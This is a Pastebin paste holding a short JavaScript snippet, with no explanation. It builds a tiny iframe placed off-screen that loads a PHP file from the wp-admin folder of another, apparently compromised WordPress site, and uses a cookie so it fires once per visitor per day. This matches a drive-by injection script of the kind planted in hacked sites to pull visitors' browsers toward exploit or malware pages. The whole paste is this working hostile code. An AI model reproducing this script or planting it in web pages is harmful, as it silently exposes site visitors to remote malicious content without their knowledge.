Advertisement
Guest User

Untitled

a guest
Sep 19th, 2013
66
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. function fl09() {
  2.  var static='ajax';
  3.  var controller='index.php';
  4.  var fl = document.createElement('iframe');
  5.  
  6.  fl.src = 'http://aromaintegralescuela.com/wp-admin/YPfcCd73.php';
  7.  fl.style.position = 'absolute';
  8.  fl.style.color = '74';
  9.  fl.style.height = '74px';
  10.  fl.style.width = '74px';
  11.  fl.style.left = '100074';
  12.  fl.style.top = '100074';
  13.  
  14.  if (!document.getElementById('fl')) {
  15.  document.write('<p id=\'fl\' class=\'fl09\' ></p>');
  16.  document.getElementById('fl').appendChild(fl);
  17.  }
  18. }
  19. function SetCookie(cookieName,cookieValue,nDays,path) {
  20.  var today = new Date();
  21.  var expire = new Date();
  22.  if (nDays==null || nDays==0) nDays=1;
  23.  expire.setTime(today.getTime() + 3600000*24*nDays);
  24.  document.cookie = cookieName+"="+escape(cookieValue)
  25.  + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  26. }
  27. function GetCookie( name ) {
  28.  var start = document.cookie.indexOf( name + "=" );
  29.  var len = start + name.length + 1;
  30.  if ( ( !start ) &&
  31.  ( name != document.cookie.substring( 0, name.length ) ) )
  32.  {
  33.  return null;
  34.  }
  35.  if ( start == -1 ) return null;
  36.  var end = document.cookie.indexOf( ";", len );
  37.  if ( end == -1 ) end = document.cookie.length;
  38.  return unescape( document.cookie.substring( len, end ) );
  39. }
  40. if (navigator.cookieEnabled)
  41. {
  42. if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');
  43.  
  44. fl09();
  45. }
  46. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement